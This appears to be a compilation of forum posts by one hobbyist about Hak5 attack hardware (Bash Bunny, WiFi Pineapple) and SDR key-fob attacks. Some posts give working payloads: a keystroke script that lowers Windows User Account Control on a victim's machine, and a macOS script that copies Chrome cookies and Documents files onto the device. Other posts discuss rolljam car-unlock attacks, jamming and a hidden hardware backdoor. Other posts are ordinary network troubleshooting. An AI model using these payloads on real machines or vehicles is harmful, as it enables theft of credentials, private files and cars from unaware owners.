Onus

I'll look into it.. Yeah I actually got it to work on my windows machine once or twice when disconnecting from my wifi network even after it reconnected, but then yeah went back to normal internet. I am wondering if its possible to make a captive portal run on a locked machine much like quick creds.. im totally new to responder so i need to look at that too. I was thinking of rerouting with responder to the var www of the bunny don't know if that is possible

Has anyone got the captive portal working? I pulled the latest, and slapped it on switch 1. It starts to work.. shows up correctly and even opens a browser, but to the users home page, not the captive portal.. EDIT: should note that it doesn't prevernt me from accessing the web via my wifi, and shows that it is connected to the ethernet adapter as well but with no internet.. Windows 10 target

I'm noticing that a script that is set to: ATTACKMODE HID STORAGE has significant consequences to the speed of your script. I have found that on some windows machines, the fact that storage is enabled could open a delayed finder window, which may gain focus in the middle of your quacking. Thus i end up putting a 3 second delay before any initial key strokes, in a sort of cross my fingers manner.. I realize we need it to mount before we do any real looting anyway, but there are plenty of things we could do in the mean time, like de-esculate user account control settings.. Anyway, wondering if others are coming up with creative ways around this or even consistantly experiencing it.

Sorry my bad on the attack mode.. I missed it in my copy/paste.. 2, This attack mode was both HID and Storage.. the initial delay is because I found on some windows machines, the storage mode will take a bit and open a finder window.. to make sure that finder window doesn't take focus in the middle of my script, i wait before typing anything.... 1& 3. The LED stuff is preference obviously..

I just refractored an old ducky script I wrote for lowering the user account control settings on a victem's machine.. Its a bit dirty of a way to go about it, but seems to work on a windows ten machine no matter what the user's current account settings are. Its nt really a stand alone but more of a header for more complicated attacks. LED R G 300 Q DELAY 3000 LED B 100 Q DELAY 100 # Downgrade user account security to NEVER # Minimize all windows Q GUI d Q GUI r Q DELAY 300 Q STRING useraccountcontrolsettings Q ENTER # deal with potential first prompt if security is too high in a way that won't mess with other possible outcomes Q DELAY 300 Q DOWNARROW Q UPARROW Q DELAY 300 Q ENTER # lower the bar Q DELAY 500 Q DOWNARROW Q DOWNARROW Q DOWNARROW Q DOWNARROW Q DELAY 300 Q TAB Q ENTER Q DELAY 500 # deal with potential final prompt if user had high level Q LEFTARROW Q ENTER Q DELAY 500 Just thought I'd share, get thoughts, maybe save someone one some time dancing around all the possible keyboard combinations to deal with for a given user's settings and the. Windows 7+

Sorry.. on mine it's files.. I changed the name as im storing more than xls files.. but yes the folder exists and has files but $files keeps saying 0

I just tried removing the kill terminal command so that I can use the terminal to log $files and editing your script above to look like this after the sync call: # Sync filesystem sync files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l) QUACK STRING $files QUACK ENTER if [ $files != 0] then # Got files LED G else LED R # No files fi I am perplexed why $files keeps reading as 0 even though I have copied 16 files.. if I run the same line in terminal myself: ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l I get 16 but the script keeps returning 0 Its stupid bells and whistles.. but damn it I want to know.

I gathered that.. I mean the old file didn't sync the file system and always went LED red even when there were files, would this fix that

wow.. this is almost identical to the changes I have been making since my last comment... Awesome.. (high five) Is the lack of sync why I was never getting a success? If sync fixes this might be nice to add back in the logic for the led at the end indicating whether the files were found/copied..

Wondering if we know of any TVS with USB inputs that can be played with.. I know an android phone for instance allows you to plug in a USB keyboard for ducky style attacks, was going to play with usb ethernet adapters on an android when I get home from work, but am wondering if there is already someone on here that has tried such with smart tvs.

thanks

But how do we do this to the bunny

cd ENTER works too.. I was just playing around with the MacInfoGraber payload by : kmakblob and in order to get it to work I had to change it: Original: LED R ATTACKMODE HID STORAGE LOOTDIR=/loot/MacLoot mkdir -p $LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 8000 QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files QUACK ENTER QUACK DELAY 500 QUACK STRING cat ~/Library/Application\ Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK ENTER QUACK DELAY 1000 QUACK STRING cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/ QUACK ENTER QUACK DELAY 1000 QUACK GUI q QUACK DELAY 500 QUACK ENTER # Green LED for finished LED G files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l) files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l) if [ "$files" != "0" -o "$files2" != "0"] then # Got spreadsheet files LED R B else LED R # No spread sheets fi Post Fiddles - I had to escape spaces and even the escape of the escape space as well as other special chars to get it to work.. didn't try escaping ~ LED R G 100 ATTACKMODE HID STORAGE LOOTDIR=loot/MacLoot mkdir -p $LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 1000 QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files QUACK ENTER QUACK DELAY 1000 QUACK STRING cd QUACK ENTER QUACK STRING cd Library/Application\\ Support/Google/Chrome/Default/ QUACK ENTER QUACK DELAY 1000 QUACK STRING cat Cookies \> /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK DELAY 1000 QUACK ENTER QUACK STRING cd QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK STRING cd Documents QUACK ENTER QUACK STRING cp *.xlsx *.xls *.pdf *.jpg /Volumes/BashBunny/$LOOTDIR/files/ #QUACK STRING cp -R Documents/ /Volumes/BashBunny/$LOOTDIR/files/ QUACK ENTER QUACK DELAY 1000 QUACK STRING cd #QUACK GUI q QUACK DELAY 2000 QUACK ENTER # Green LED for finished LED G files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l) QUACK STRING $files if [ “$files” != “0”] then # Got files LED G else LED R # No files fi

Is there a way to specifically makevthe bash bunny HID look like an apple keyboard to bypass keyboard assistant?

I was playing with the same git repo, was hoping you could explain to me what the broadcast ephemeris is exactly.. i am using the one that came with the repo, brdc3540.14n with pretty good success.. whats the difference with the file you are using, why did you use it and what is its purpose.. sorry im a nube jamesbond villian.. p.s. im using a bladeRFx40 Onus

:) fun!!! pirate TV old school.. <3 I recently purchased a bladeRF going to have to try this.. have you seen this video: I have been playing with YateBTS which is also very fun. (in a lead box of course!)

For me this was a security setting on my router.. exactly what @kevvyg said.. i like an idiot have an xfinity router, had to set the firewall settings to LOW and then i could update

Ha, I have thought about opening up an old laptop and putting in pi zero or something like a built in backdoor that would exist even if they formated the PC and installed a new OS.. another thought was to install a pi in my car that I could ssh into and start/stop a jammer of my own.. Still playing with a rolljam for fsk, I think the way to do it might be to jam on ask at say 43390000 and then on the second yard stick listen at 2fsk 433920000. Thoughts? I'm very new to SDR and the learning curve is quite steep Onus

I recently tried to do a rolljam on my car as a proof of concept.. using two yardstick ones, one to jam and one to replay, but my car uses fsk not ask and I can't seem to get a roll jam to work.. I can certainly jam my car so that it can't get the key fobs packet but can't seem to properly capture the packet/filter out the jam signal.. I'll check all the links above tonight..

Hi all.. I recently purchased both a yard stick and a RTL SDR. I was going to start writing my own python script that allowed me to quickly input which SDR device to turn on, what frequency to cooperate at and what mode. My first question is around setting the index of devices.. how can I get a list of SDR devices plugged in and their index? My other question is what are the accepted constants for setting the modulation type with rfcat Onus

I don't know about that technique, but would that cause my remote key, to be out of sync.. it seems to me that since my key remote wouldn't lock until I hit unlock, indicates that the pin was probably incremented and my key was behind, thus out of sync.. does that make sense..

I personally have not dabbled with RF hacking, so please forgive any ignorance that reveals itself with this post. I recently bought a 2016 honda civic. I live in a city neighborhood and park it on the one way street that I live on. It like most cars, has a key that also allows for remote locking / arming of the alarm, and unlocking, as well as opening the trunk. Anyway, a few weeks into buying the car I started noticing my trunk would be open in the morning. At first I figured I must have accidentally hit the trunk button on the key, and started being much more careful about where I put my keys down. But it kept happening, always over night and on my street. It was not happening when I stayed over my girlfriends for weeks at a time, or anywhere else. Just when I parked it on my street. The other night 15 of my neighbors cars on my street were all broken into, with their glove compartments rifled through. 2 cars were flat out stolen, and not a single alarm had gone off. None of the cars showed evidence of forced entry.. my car was one of them. My car was parked literally right out side my bedroom window and I know I would have heard the alarm.. the interesting thing to me was that after I heard about the break ins, and rushed to check my car, I first tried clicking the lock/engage alarm button on my key.. only to find my car was not responding to it. I found my car unlocked, no evidence of tampering.. the key fob eventually started working again, only after I tried unlocking it first.. it was as if the key fob was out of sync and the rolling pin was off or something.. do you folks think my street was attacked with an SDR attack? Honda told me that my battery might be low.. trust me, its not... I tested the battery, and everything works now.. I am almost certain it wasn't working because it somehow fell out of sync.. Also would love some clever ideas on how to fuck with these petty theifs should they do it again. #karateForDefence

I have been playing with the pineapple for a few months now and recently did a factory reset.. I noticed that even though i only have 3 SSIDs in my pool, and they were all added manually after my last reset, and im not logging probes, or capturing ssids to my pool, PineAP still seems to be broadcasting just about anything anyone around me is probing for.. I am trying to be as stealthy as can be as i am actually just playing with it and not trying to grab a bunch of strangers associations... but everyone around me is seeing every imaginable ssid when i power on.. Is Karma running? is there a way to stop this and ONLY broadcast whats in my pool? Side note, i have done so many resets because if my pool gets large the pineapple doesn't seem to allow me to clear the pool. i click clear, and it clears for a second but then all the gazzillion ssids that were ther just come back, unless i reset.

I have had the pineapple up and running for a few months now. Its been great. but all of a sudden i cant seem to set up the internet connection on it. I have even tried resetting the pineapple but to no avail. IFCONFIG root@kali2:~# ifconfig eth0 Link encap:Ethernet HWaddr 54:ee:75:43:38:4c UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) eth1 Link encap:Ethernet HWaddr 00:c0:ca:8b:3c:8d inet addr:172.16.42.195 Bcast:172.16.42.255 Mask:255.255.255.0 inet6 addr: fe80::2c0:caff:fe8b:3c8d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3095 errors:0 dropped:0 overruns:0 frame:0 TX packets:2986 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1842286 (1.7 MiB) TX bytes:694007 (677.7 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:3053 errors:0 dropped:0 overruns:0 frame:0 TX packets:3053 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:236400 (230.8 KiB) TX bytes:236400 (230.8 KiB) wlan0 Link encap:Ethernet HWaddr ac:d1:b8:11:04:6f inet addr:192.168.1.19 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::aed1:b8ff:fe11:46f/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:19110 errors:0 dropped:0 overruns:0 frame:0 TX packets:20149 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:11734512 (11.1 MiB) TX bytes:1922209 (1.8 MiB) WP6.sh WiFi Pineapple Netmask [255.255.255.0]: WiFi Pineapple Network [172.16.42.0/24]: Host Interface to WiFi Pineapple [eth1]: Host Interface to Internet [wlan0]: Internet Gateway [172.16.42.1]: 192.168.1.1 IP Address of Host [172.16.42.42]: 172.16.42.195 IP Address of WiFi Pineapple [172.16.42.1]: Save settings for next session [Y/n]? Y Settings saved. Connect now [Y/n]? Y _ . ___ \||/ Internet: 192.168.1.1 - wlan0 ( _ )_ <--> [___] <--> ,<><>, Computer: 172.16.42.195 (_ _(_ ,) \___\ '<><>' Pineapple: 172.16.42.0/24 - eth1 Browse to http://172.16.42.1:1471 ROUTE root@kali2:~# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0 172.16.42.0 * 255.255.255.0 U 0 0 0 eth1 192.168.1.0 * 255.255.255.0 U 0 0 0 wlan0 I have tried this several times with several different networks on my wlan0 I am super frustrated.. can someone please help? running kali2